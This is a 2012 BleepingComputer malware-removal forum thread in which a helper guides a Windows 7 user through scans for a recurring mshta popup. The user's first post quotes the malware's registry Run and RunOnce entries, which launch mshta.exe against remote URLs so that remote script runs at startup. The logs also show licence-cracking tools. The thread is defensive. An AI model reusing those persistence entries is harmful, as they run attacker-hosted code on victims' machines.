Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Pop up on desktop that keeps coming back


  • This topic is locked This topic is locked
13 replies to this topic

#1 vinnie946

vinnie946

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:04:54 AM

Posted 14 April 2012 - 09:46 AM

Hi,

Having a problem with my laptop (64bit, Windows 7), A pop up always comes up during startup to a webpage and only has a close button. Ending mshta.exe in task manager seems to close it temporarily, but comes back after a few minutes. I've also noticed two (hidden) folders which are related to this under C:\Users, as i've not created these folders myself. One folder with an exe file called mshost.exe, a systemboot shortcut. The other with a RegWrite folder with the target: C:\Windows\System32\mshta.exe http://mrwiq.info/set_inf2.php?cccid=SCksjDDymdz0PiqvcwiQawJb8dH194dJ
and also a registry file which has the following:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"SystemBootSCksjDDymdz0PiqvcwiQawJb8dH194dJ"="mshta.exe http://mrwiq.info/reg2.php?cccid=SCksjDDymdz0PiqvcwiQawJb8dH194dJ"
"RegWriteSCksjDDymdz0PiqvcwiQawJb8dH194dJ"="mshta.exe http://mrwiq.info/set_inf2.php?cccid=SCksjDDymdz0PiqvcwiQawJb8dH194dJ"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"RegWriteSCksjDDymdz0PiqvcwiQawJb8dH194dJ"="REG IMPORT C:/Users/Vincent/SoftRecovery/datSCksjDDymdz0PiqvcwiQawJb8dH194dJ.reg"

Tried deleting the folders and ran Malwarebytes, it seemed to have picked up the folders as malware, but after removing/deleting them it just comes back after reboot
I've also tried to disable it during startup with msconfig, but no luck.

I've run DDS and have the log attached.

2012-04-14 13:56:02 -------- d--h--w- C:\Users\Vincent\UserProfile
2012-04-14 13:56:02 -------- d--h--w- C:\Users\Vincent\SoftRecovery
^These two folders are the ones with the exe file and registry file

Hope theres a solution to this, and thanks for hearing me out.

Vincent

Attached Files

  • Attached File  DDS.txt   31.04KB   1 downloads


BC AdBot (Login to Remove)

 


#2 gringo_pr

gringo_pr

    Bleepin Gringo


  • Malware Response Team
  • 136,772 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Puerto rico
  • Local time:12:54 AM

Posted 14 April 2012 - 02:58 PM

Hello and Welcome to Bleeping Computer!!

My name is Gringo and I'll be glad to help you with your computer problems.

I have put together somethings for you to keep in mind while I am helping you to make things go easier and faster for both of us

  • Please do not run any tools unless instructed to do so.
    • We ask you to run different tools in a specific order to ensure the malware is completely removed from your machine, and running any additional tools may detect false positives, interfere with our tools, or cause unforeseen damage or system instability.
  • Please do not attach logs or use code boxes, just copy and paste the text.
    • Due to the high volume of logs we receive it helps to receive everything in the same format, and code boxes make the logs very difficult to read. Also, attachments require us to download and open the reports when it is easier to just read the reports in your post.
  • Please read every post completely before doing anything.
    • Pay special attention to the NOTE: lines, these entries identify an individual issue or important step in the cleanup process.
  • Please provide feedback about your experience as we go.
    • A short statement describing how the computer is working helps us understand where to go next, for example: I am still getting redirected, the computer is running normally, etc. Please do not describe the computer as "the same", this requires the extra step of looking back at your previous post.
NOTE: At the top of your post, click on the Watch Topic Button, select Immediate Notification, and click on Proceed. This will send you an e-mail as soon as I reply to your topic, allowing us to resolve the issue faster.

NOTE: Backup any files that cannot be replaced. Removing malware can be unpredictable and this step can save a lot of hartaches if things don't go as planed. You can put them on a CD/DVD, external drive or a pen drive, anywhere except on the computer.

NOTE: It is good practice to copy and paste the instructions into notepad and print them in case it is necessary for you to go offline during the cleanup process. To open notepad, navigate to Start Menu > All Programs > Accessories > Notepad. Please remember to copy the entire post so you do not miss any instructions.

Security Check

  • Download Security Check by screen317 from here.
  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.



Run Combofix:

You may be asked to install or update the Recovery Console (Win XP Only) if this happens please allow it to do so (you will need to be connected to the internet for this)

Before you run Combofix I will need you to turn off any security software you have running, If you do not know how to do this you can find out >here< or >here<

Combofix may need to reboot your computer more than once to do its job this is normal.

You can download Combofix from one of these links.
Link 1
Link 2
Link 3
1. Close any open browsers or any other programs that are open.
2. Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.

Double click on combofix.exe & follow the prompts.
When finished, it will produce a report for you.

Note 1: Do not mouseclick combofix's window while it's running. That may cause it to stall

Note 2: If you recieve an error "Illegal operation attempted on a registery key that has been marked for deletion." Please restart the computer

"information and logs"

  • In your next post I need the following
  • Log from Combofix
  • let me know of any problems you may have had
  • How is the computer doing now?

Gringo
I Close My Topics If You Have Not Replied In 5 Days If You Will Be Longer Please Let Me Know

If I Have Not Replied To One Of My Topics In 48 Hrs Please Bump The Topic



My help is free, however, if you wish to make a small donation to show your appreciation or to help me continue the fight against Malware, then click here -->btn_donate_SM.gif<-- Don't worry every little bit helps.

Proud Graduate Of Malware Removal University

#3 vinnie946

vinnie946
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:04:54 AM

Posted 16 April 2012 - 03:26 PM

Hello, sorry for a late reply, have been busy with some work

The laptop seems to have gotten slower, but i'm not sure whether it's just me being paranoid :P
Also, sometimes multple pop ups appear, not sure whether if theyre the same, since i disconnect my internet before they pop up so that it won't load the page and just leave it there.

Another thing - I couldnt seem to download combofix right off firefox or any other browser, i had to download it through my phone and transfer the file through USB. Again, not sure if this is just my internet being sluggish (it's been REALLY slow the past few weeks)

Here's the checkup log:

Results of screen317's Security Check version 0.99.32
Windows 7 x64 (UAC is enabled)
Internet Explorer 9
``````````````````````````````
Antivirus/Firewall Check:

Windows Firewall Disabled!
WMI entry may not exist for antivirus; attempting automatic update.
```````````````````````````````
Anti-malware/Other Utilities Check:

MVPS Hosts File
Spybot - Search & Destroy
TuneUp Utilities 2012
TuneUp Utilities Language Pack (en-US)
Java™ 6 Update 31
Adobe Reader X (10.1.2)
Mozilla Firefox (11.0.)
````````````````````````````````
Process Check:
objlist.exe by Laurent

Malwarebytes' Anti-Malware mbamservice.exe
Malwarebytes' Anti-Malware mbamgui.exe
``````````End of Log````````````


Combofix log:

ComboFix 12-04-16.02 - Vincent 16/04/2012 21:01:06.1.2 - x64
Microsoft Windows 7 Ultimate 6.1.7601.1.1252.44.1033.18.4063.2530 [GMT 1:00]
Running from: c:\users\Vincent\Documents\BPC\ComboFix.exe
AV: ESET Smart Security 5.0 *Disabled/Updated* {77DEAFED-8149-104B-25A1-21771CA47CD1}
FW: ESET Personal firewall *Disabled* {4FE52EC8-CB26-1113-0EFE-8842E2773BAA}
SP: ESET Smart Security 5.0 *Disabled/Updated* {CCBF4E09-A773-1FC5-1F11-1A056723366C}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
C:\install.exe
c:\users\Vincent\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RegWrite.lnk
.
.
((((((((((((((((((((((((( Files Created from 2012-03-16 to 2012-04-16 )))))))))))))))))))))))))))))))
.
.
2012-04-16 20:08 . 2012-04-16 20:08 77824 ----a-w- c:\windows\KMSEmulator.exe
2012-04-16 20:07 . 2012-04-16 20:07 -------- d-----w- c:\users\Default\AppData\Local\temp
2012-04-14 15:01 . 2012-04-14 15:01 -------- d-----r- C:\Sandbox
2012-04-14 15:00 . 2012-04-14 15:00 -------- d-----w- c:\program files\Sandboxie
2012-04-14 13:56 . 2012-04-14 13:56 -------- d--h--w- c:\users\Vincent\SoftRecovery
2012-04-14 13:56 . 2012-04-14 13:56 -------- d--h--w- c:\users\Vincent\UserProfile
2012-04-14 11:39 . 2012-04-16 19:28 -------- d-----w- c:\users\Vincent\.gstreamer-0.10
2012-04-14 11:18 . 2012-04-14 11:47 -------- d-----w- c:\program files (x86)\Spybot - Search & Destroy
2012-04-14 11:18 . 2012-04-14 11:44 -------- d-----w- c:\programdata\Spybot - Search & Destroy
2012-04-14 02:57 . 2012-04-14 02:57 -------- d-----w- c:\users\Vincent\AppData\Roaming\RightsNetwork
2012-04-14 02:56 . 2012-04-14 02:58 -------- d-----w- c:\program files (x86)\RightsNetwork
2012-04-13 16:28 . 2012-04-13 16:28 -------- d--h--w- c:\programdata\Common Files
2012-04-13 13:53 . 2012-04-13 13:53 -------- d-----w- c:\program files\Windows Live
2012-04-13 13:27 . 2012-03-14 03:27 8669240 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{15F0AC75-0BD6-4D13-B4C9-FCDEF6B21E61}\mpengine.dll
2012-04-13 00:04 . 2012-04-05 11:08 25920 ----a-w- c:\windows\system32\authuitu.dll
2012-04-13 00:04 . 2012-04-05 11:08 21312 ----a-w- c:\windows\SysWow64\authuitu.dll
2012-04-12 04:17 . 2012-03-01 06:46 23408 ----a-w- c:\windows\system32\drivers\fs_rec.sys
2012-04-12 04:17 . 2012-03-01 06:33 81408 ----a-w- c:\windows\system32\imagehlp.dll
2012-04-12 04:17 . 2012-03-01 05:33 159232 ----a-w- c:\windows\SysWow64\imagehlp.dll
2012-04-12 04:17 . 2012-03-01 06:38 220672 ----a-w- c:\windows\system32\wintrust.dll
2012-04-12 04:17 . 2012-03-01 06:28 5120 ----a-w- c:\windows\system32\wmi.dll
2012-04-12 04:17 . 2012-03-01 05:37 172544 ----a-w- c:\windows\SysWow64\wintrust.dll
2012-04-12 04:17 . 2012-03-01 05:29 5120 ----a-w- c:\windows\SysWow64\wmi.dll
2012-04-11 22:47 . 2012-04-11 22:47 -------- d-----w- c:\program files (x86)\SystemRequirementsLab
2012-04-11 22:47 . 2012-04-11 22:47 -------- d-----w- c:\users\Vincent\AppData\Roaming\SystemRequirementsLab
2012-04-09 01:51 . 2012-04-09 02:02 298016 ----a-w- c:\windows\SysWow64\PnkBstrB.xtr
2012-04-09 01:51 . 2012-04-09 01:51 -------- d-----w- c:\users\Vincent\AppData\Local\PunkBuster
2012-04-09 01:27 . 2012-04-09 01:27 -------- d-----w- C:\Perfect World Entertainment
2012-04-09 01:26 . 2012-04-09 01:26 -------- d-----w- c:\windows\3F5C371F8EA24F259D3DD0B4526E3AEA.TMP
2012-04-09 01:25 . 2012-04-09 01:25 -------- d-----w- c:\program files (x86)\Common Files\Wise Installation Wizard
2012-04-09 01:25 . 2012-04-09 02:02 298016 ----a-w- c:\windows\SysWow64\PnkBstrB.exe
2012-04-09 01:25 . 2012-04-09 01:51 298016 ----a-w- c:\windows\SysWow64\PnkBstrB.ex0
2012-04-09 01:25 . 2012-04-09 01:52 76888 ----a-w- c:\windows\SysWow64\PnkBstrA.exe
2012-04-09 01:25 . 2011-12-19 14:16 3130440 ----a-w- c:\windows\SysWow64\pbsvc_blr.exe
2012-04-08 17:10 . 2012-04-08 17:10 -------- d-----w- c:\users\Vincent\AppData\Local\Skyrim
2012-04-08 16:59 . 2012-04-08 17:09 -------- d-----w- c:\program files (x86)\The Elder Scrolls V Skyrim
2012-04-08 15:44 . 2012-04-13 23:44 8741536 ----a-w- c:\windows\SysWow64\FlashPlayerInstaller.exe
2012-04-08 15:03 . 2012-04-13 23:44 418464 ----a-w- c:\windows\SysWow64\FlashPlayerApp.exe
2012-04-08 01:26 . 2012-04-08 01:26 -------- d-----w- c:\program files\Bonjour
2012-04-08 01:26 . 2012-04-08 01:26 -------- d-----w- c:\program files (x86)\Bonjour
2012-04-08 01:26 . 2012-04-08 01:26 -------- d-----w- c:\programdata\Apple
2012-04-08 01:09 . 2012-04-08 01:16 -------- d-----w- c:\programdata\webcamXP 5
2012-04-08 00:55 . 2012-04-08 15:01 -------- d-----w- c:\program files (x86)\ManyCam
2012-04-08 00:54 . 2012-04-08 00:54 -------- d-----w- c:\programdata\Ask
2012-04-07 23:03 . 2012-04-07 23:03 -------- d-----w- c:\users\Vincent\AppData\Roaming\Malwarebytes
2012-04-07 23:03 . 2012-04-07 23:03 -------- d-----w- c:\programdata\Malwarebytes
2012-04-07 23:03 . 2012-04-11 11:04 -------- d-----w- c:\program files (x86)\Malwarebytes' Anti-Malware
2012-04-07 23:03 . 2012-04-04 14:56 24904 ----a-w- c:\windows\system32\drivers\mbam.sys
2012-04-07 22:50 . 2012-04-07 22:50 -------- d-----w- c:\users\UpdatusUser
2012-04-06 22:25 . 2012-04-06 22:25 -------- d-----w- c:\users\Vincent\AppData\Roaming\StreamTorrent
2012-04-06 22:05 . 2012-04-06 22:05 -------- d-----w- c:\users\Vincent\AppData\Local\Facebook
2012-04-05 21:46 . 2012-04-05 21:46 -------- d-----w- c:\users\Vincent\AppData\Local\Motorola
2012-04-05 21:46 . 2012-04-05 21:46 -------- d-----w- c:\program files (x86)\Common Files\Nero
2012-04-05 21:46 . 2012-04-05 21:46 -------- d-----w- C:\Binaries
2012-04-05 21:46 . 2012-04-05 21:46 -------- d-----w- c:\programdata\Nero
2012-04-05 21:46 . 2012-04-05 21:46 -------- d-----w- c:\program files (x86)\Motorola Media Link
2012-04-05 21:46 . 2012-04-05 21:46 -------- d-----w- c:\programdata\Motorola
2012-04-05 21:46 . 2012-04-05 21:46 -------- d-----w- c:\program files (x86)\Motorola Mobility
2012-04-05 21:46 . 2012-04-05 21:46 -------- d-----w- c:\program files\Motorola Inc
2012-04-05 21:44 . 2012-04-16 19:54 -------- d-----w- c:\users\Vincent\AppData\Roaming\MotoCast
2012-04-05 16:21 . 2012-04-16 19:28 -------- d-----w- c:\users\Vincent\AppData\Local\Pokki
2012-04-04 12:20 . 2012-04-04 12:20 -------- d-----w- c:\users\Vincent\AppData\Roaming\AVS4YOU
2012-04-04 02:16 . 2012-04-04 02:44 -------- d-----w- C:\Fraps
2012-03-31 14:30 . 2012-03-31 14:36 -------- d-----w- c:\program files (x86)\Amnesia - The Dark Descent
2012-03-30 21:08 . 2012-03-30 21:08 -------- d-----w- C:\NEXON
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2012-04-13 23:44 . 2011-12-30 22:06 70304 ----a-w- c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2012-04-05 11:08 . 2012-03-06 21:22 34624 ----a-w- c:\windows\system32\TURegOpt.exe
2012-04-05 11:08 . 2012-03-06 21:25 35648 ----a-w- c:\windows\system32\uxtuneup.dll
2012-04-05 11:08 . 2012-03-06 21:25 28992 ----a-w- c:\windows\SysWow64\uxtuneup.dll
2012-03-14 14:23 . 2012-03-14 14:23 614400 ----a-w- c:\windows\AutoKMS.exe
2012-03-08 17:50 . 2012-03-08 17:50 49016 ----a-w- c:\windows\SysWow64\sirenacm.dll
2012-03-06 12:01 . 2012-03-06 12:01 2366920 ----a-w- c:\windows\SysWow64\ijl20.dll
2012-03-01 00:02 . 2011-12-30 21:54 9717568 ----a-w- c:\windows\system32\nvwgf2umx.dll
2012-03-01 00:02 . 2011-12-30 21:54 7713088 ----a-w- c:\windows\SysWow64\nvwgf2um.dll
2012-03-01 00:02 . 2011-12-30 21:54 2660160 ----a-w- c:\windows\system32\nvapi64.dll
2012-03-01 00:02 . 2011-12-30 21:54 2301248 ----a-w- c:\windows\SysWow64\nvapi.dll
2012-03-01 00:02 . 2011-12-30 21:54 1737536 ----a-w- c:\windows\system32\nvdispco64.dll
2012-03-01 00:02 . 2011-12-30 21:54 15009600 ----a-w- c:\windows\SysWow64\nvd3dum.dll
2012-03-01 00:02 . 2011-12-30 21:54 1466176 ----a-w- c:\windows\system32\nvgenco64.dll
2012-02-29 21:00 . 2011-12-30 21:54 3089728 ----a-w- c:\windows\system32\nvsvc64.dll
2012-02-29 21:00 . 2011-12-30 21:54 6074176 ----a-w- c:\windows\system32\nvcpl.dll
2012-02-29 20:59 . 2011-12-30 21:54 889664 ----a-w- c:\windows\system32\nvvsvc.exe
2012-02-29 20:59 . 2011-12-30 21:54 63296 ----a-w- c:\windows\system32\nvshext.dll
2012-02-29 20:59 . 2011-12-30 21:54 2561856 ----a-w- c:\windows\system32\nvsvcr.dll
2012-02-29 20:59 . 2011-12-30 21:54 118080 ----a-w- c:\windows\system32\nvmctray.dll
2012-02-28 21:54 . 2012-01-07 15:17 472808 ----a-w- c:\windows\SysWow64\deployJava1.dll
2012-02-27 12:38 . 2012-02-27 12:38 2782848 ----a-w- c:\windows\system32\drivers\kinonivd.sys
2012-02-27 12:38 . 2012-02-27 12:38 23040 ----a-w- c:\windows\system32\drivers\kinonivad.sys
2012-02-23 09:18 . 2011-12-30 21:45 279656 ------w- c:\windows\system32\MpSigStub.exe
2012-02-22 10:34 . 2012-02-22 10:34 28160 ----a-w- c:\windows\system32\drivers\mcaudrv_x64.sys
2012-02-17 06:38 . 2012-03-14 14:05 1112064 ----a-w- c:\windows\system32\rdpcorets.dll
2012-02-17 06:38 . 2012-03-14 14:05 1031680 ----a-w- c:\windows\system32\rdpcore.dll
2012-02-17 05:34 . 2012-03-14 14:05 826880 ----a-w- c:\windows\SysWow64\rdpcore.dll
2012-02-17 04:58 . 2012-03-14 14:05 210944 ----a-w- c:\windows\system32\drivers\rdpwd.sys
2012-02-17 04:57 . 2012-03-14 14:05 23552 ----a-w- c:\windows\system32\drivers\tdtcp.sys
2012-02-10 06:36 . 2012-03-14 14:06 1544192 ----a-w- c:\windows\system32\DWrite.dll
2012-02-10 05:38 . 2012-03-14 14:06 1077248 ----a-w- c:\windows\SysWow64\DWrite.dll
2012-02-03 04:34 . 2012-03-14 14:06 3145728 ----a-w- c:\windows\system32\win32k.sys
2012-01-25 12:58 . 2012-01-25 12:58 27136 ----a-w- c:\windows\system32\drivers\Motousbnet.sys
2012-01-25 12:57 . 2012-01-25 12:57 30720 ----a-w- c:\windows\system32\drivers\motmodem.sys
2012-01-25 12:57 . 2012-01-25 12:57 9728 ----a-w- c:\windows\system32\drivers\motccgpfl.sys
2012-01-25 12:57 . 2012-01-25 12:57 22016 ----a-w- c:\windows\system32\drivers\motccgp.sys
2012-01-25 06:38 . 2012-03-14 14:05 77312 ----a-w- c:\windows\system32\rdpwsx.dll
2012-01-25 06:38 . 2012-03-14 14:05 149504 ----a-w- c:\windows\system32\rdpcorekmts.dll
2012-01-25 06:33 . 2012-03-14 14:05 9216 ----a-w- c:\windows\system32\rdrmemptylst.exe
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Pokki"="c:\users\Vincent\AppData\Local\Pokki\v0.252\pokki.exe" [2012-04-13 2540856]
"MotoCast"="c:\program files (x86)\Motorola Mobility\MotoCast\MotoLauncher.lnk" [2012-04-05 2051]
"Facebook Update"="c:\users\Vincent\AppData\Local\Facebook\Update\FacebookUpdate.exe" [2012-04-06 137536]
"SpybotSD TeaTimer"="c:\program files (x86)\Spybot - Search & Destroy\TeaTimer.exe" [2009-03-05 2260480]
"SandboxieControl"="c:\program files\Sandboxie\SbieCtrl.exe" [2012-04-10 668944]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"YouCam Service"="c:\program files (x86)\CyberLink\YouCam\YouCamService.exe" [2011-09-09 247016]
"SwitchBoard"="c:\program files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe" [2010-02-19 517096]
"AdobeCS5ServiceManager"="c:\program files (x86)\Common Files\Adobe\CS5ServiceManager\CS5ServiceManager.exe" [2010-02-22 406992]
"BCSSync"="c:\program files (x86)\Microsoft Office\Office14\BCSSync.exe" [2010-01-21 91520]
"Malwarebytes' Anti-Malware"="c:\program files (x86)\Malwarebytes' Anti-Malware\mbamgui.exe" [2012-04-04 462408]
.
c:\users\Vincent\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Facebook Messenger.lnk - c:\users\Vincent\AppData\Local\Facebook\Messenger\2.0.4478.0\FacebookMessenger.exe [2012-4-5 204288]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa]
Security Packages REG_MULTI_SZ kerberos msv1_0 schannel wdigest tspkg pku2u livessp
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys]
@="Driver"
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\run-]
"Adobe ARM"="c:\program files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
"SunJavaUpdateSched"="c:\program files (x86)\Common Files\Java\Java Update\jusched.exe"
.
R2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2010-03-18 130384]
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2010-03-18 138576]
R3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-13 253088]
R3 BTCFilterService;USB Networking Driver Filter Service;c:\windows\system32\DRIVERS\motfilt.sys [x]
R3 EagleX64;EagleX64;c:\windows\system32\drivers\EagleX64.sys [x]
R3 KINONI_Wave;Kinoni Audio Source;c:\windows\system32\drivers\kinonivad.sys [x]
R3 kinonivd;Kinoni Video Source;c:\windows\system32\DRIVERS\kinonivd.sys [x]
R3 ManyCam;ManyCam Virtual Webcam;c:\windows\system32\DRIVERS\mcvidrv_x64.sys [x]
R3 mcaudrv_simple;ManyCam Virtual Microphone;c:\windows\system32\drivers\mcaudrv_x64.sys [x]
R3 motandroidusb;Mot ADB Interface Driver;c:\windows\system32\Drivers\motoandroid.sys [x]
R3 motccgp;Motorola USB Composite Device Driver;c:\windows\system32\DRIVERS\motccgp.sys [x]
R3 motccgpfl;MotCcgpFlService;c:\windows\system32\DRIVERS\motccgpfl.sys [x]
R3 Motousbnet;Motorola USB Networking Driver Service;c:\windows\system32\DRIVERS\Motousbnet.sys [x]
R3 NMgamingmsFltr;USB Optical Mouse;c:\windows\system32\drivers\NMgamingms.sys [x]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys [x]
R3 SwitchBoard;SwitchBoard;c:\program files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [2010-02-19 517096]
R3 Synth3dVsc;Synth3dVsc;c:\windows\system32\drivers\synth3dvsc.sys [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys [x]
R3 tsusbhub;tsusbhub;c:\windows\system32\drivers\tsusbhub.sys [x]
R3 VGPU;VGPU;c:\windows\system32\drivers\rdvgkmd.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe [x]
R3 WDC_SAM;WD SCSI Pass Thru driver;c:\windows\system32\DRIVERS\wdcsam64.sys [x]
S0 epfwwfp;epfwwfp;c:\windows\system32\DRIVERS\epfwwfp.sys [x]
S1 ehdrv;ehdrv;c:\windows\system32\DRIVERS\ehdrv.sys [x]
S1 EpfwLWF;Epfw NDIS LightWeight Filter;c:\windows\system32\DRIVERS\EpfwLWF.sys [x]
S1 vwififlt;Virtual WiFi Filter Driver;c:\windows\system32\DRIVERS\vwififlt.sys [x]
S2 AdobeARMservice;Adobe Acrobat Update Service;c:\program files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [2012-01-03 63928]
S2 AESTFilters;Andrea ST Filters Service;c:\windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_960c1f056a541068\AESTSr64.exe [2009-03-02 89600]
S2 DeviceMonitorService;DeviceMonitorService;c:\program files (x86)\Motorola Media Link\Lite\NServiceEntry.exe [2012-02-16 87368]
S2 eamonm;eamonm;c:\windows\system32\DRIVERS\eamonm.sys [x]
S2 ekrn;ESET Service;c:\program files\ESET\ESET Smart Security\x86\ekrn.exe [2011-09-22 974944]
S2 MBAMService;MBAMService;c:\program files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe [2012-04-04 654408]
S2 MotoHelper;MotoHelper Service;c:\program files (x86)\Motorola\MotoHelper\MotoHelperService.exe [2012-02-01 214896]
S2 nvUpdatusService;NVIDIA Update Service Daemon;c:\program files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe [2012-03-01 2348352]
S2 SBSDWSCService;SBSD Security Center Service;c:\program files (x86)\Spybot - Search & Destroy\SDWinSec.exe [2009-01-26 1153368]
S2 TuneUp.UtilitiesSvc;TuneUp Utilities Service;c:\program files (x86)\TuneUp Utilities 2012\TuneUpUtilitiesService64.exe [2012-04-05 2143552]
S3 clwvd;CyberLink WebCam Virtual Driver;c:\windows\system32\DRIVERS\clwvd.sys [x]
S3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [x]
S3 NETw5s64;Intel® Wireless WiFi Link 5000 Series Adapter Driver for Windows 7 - 64 Bit;c:\windows\system32\DRIVERS\NETw5s64.sys [x]
S3 NVHDA;Service for NVIDIA High Definition Audio Driver;c:\windows\system32\drivers\nvhda64v.sys [x]
S3 osppsvc;Office Software Protection Platform;c:\program files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE [2010-01-09 4925184]
S3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt64win7.sys [x]
S3 TuneUpUtilitiesDrv;TuneUpUtilitiesDrv;c:\program files (x86)\TuneUp Utilities 2012\TuneUpUtilitiesDriver64.sys [2011-12-12 11856]
.
.
--- Other Services/Drivers In Memory ---
.
*NewlyCreated* - WS2IFSL
.
Contents of the 'Scheduled Tasks' folder
.
2012-04-16 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-08 23:44]
.
2012-04-16 c:\windows\Tasks\AutoKMS.job
- c:\windows\AutoKMS.exe [2012-03-14 14:23]
.
2012-04-14 c:\windows\Tasks\FacebookUpdateTaskUserS-1-5-21-450020240-1868592112-3265372428-1000Core.job
- c:\users\Vincent\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-04-06 22:05]
.
2012-04-15 c:\windows\Tasks\FacebookUpdateTaskUserS-1-5-21-450020240-1868592112-3265372428-1000UA.job
- c:\users\Vincent\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-04-06 22:05]
.
.
--------- x86-64 -----------
.
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Apoint"="c:\program files\Apoint2K\Apoint.exe" [2009-05-14 318464]
"SysTrayApp"="c:\program files\IDT\WDM\sttray64.exe" [2010-03-23 487424]
"egui"="c:\program files\ESET\ESET Smart Security\egui.exe" [2011-09-22 4035152]
"TNod UP"="c:\users\Vincent\Downloads\TNOD Update\TNod-1.4.1-Final-Portable\TNODUP.exe" [2011-09-18 1892352]
"AdobeAAMUpdater-1.0"="c:\program files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe" [2010-03-06 500208]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs"=0x0
.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost - NetSvcs
UxTuneUp
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = *.local;192.168.*.*
IE: E&xport to Microsoft Excel - c:\progra~2\MICROS~3\Office14\EXCEL.EXE/3000
TCP: DhcpNameServer = 194.168.4.100 194.168.8.100
FF - ProfilePath - c:\users\Vincent\AppData\Roaming\Mozilla\Firefox\Profiles\febeprof.test\
FF - prefs.js: browser.startup.homepage - hxxps://www.facebook.com/|http://www.thepiratebay.org
FF - user.js: network.http.max-persistent-connections-per-server - 4
FF - user.js: nglayout.initialpaint.delay - 600
FF - user.js: content.notify.interval - 600000
FF - user.js: content.max.tokenizing.time - 1800000
FF - user.js: content.switch.threshold - 600000
.
- - - - ORPHANS REMOVED - - - -
.
AddRemove-Adobe Shockwave Player - c:\windows\system32\Adobe\Shockwave 11\uninstaller.exe
AddRemove-PunkBusterSvc - c:\windows\system32\pbsvc_blr.exe
.
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-450020240-1868592112-3265372428-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.eml\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="WindowsLiveMail.Email.1"
.
[HKEY_USERS\S-1-5-21-450020240-1868592112-3265372428-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vcf\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="WindowsLiveMail.VCard.1"
.
